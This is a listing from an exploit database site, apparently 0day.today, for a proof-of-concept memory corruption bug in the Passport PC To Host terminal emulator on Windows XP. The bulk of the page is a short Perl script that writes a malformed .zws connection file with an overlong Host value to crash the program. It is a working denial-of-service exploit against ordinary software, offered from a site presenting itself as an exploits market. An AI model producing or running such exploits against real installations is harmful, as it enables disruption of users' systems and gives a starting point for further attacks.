[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Passport PC To Host Malformed .zws file Memory Corruption Vulnerability

Author
Silent_Dream
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-17615
Category
dos / poc
Date add
03-03-2012
Platform
windows
# Exploit Title: Passport PC To Host Malformed .zws file Memory Corruption
# Date: 3-3-12
# Author: Silent Dream
# Software Link: http://www.zephyrcorp.com/terminal-emulation/
# Version: Latest (2011-506-S)
# Tested on: Windows XP SP3
my $file = "passport_pwn.zws";
my $head = "[Connection]\nHost=";
my $junk = "a" x 150;
open($File, ">$file");
print $File $head.$junk;
close($FILE);



#  0day.today [2024-10-06]  #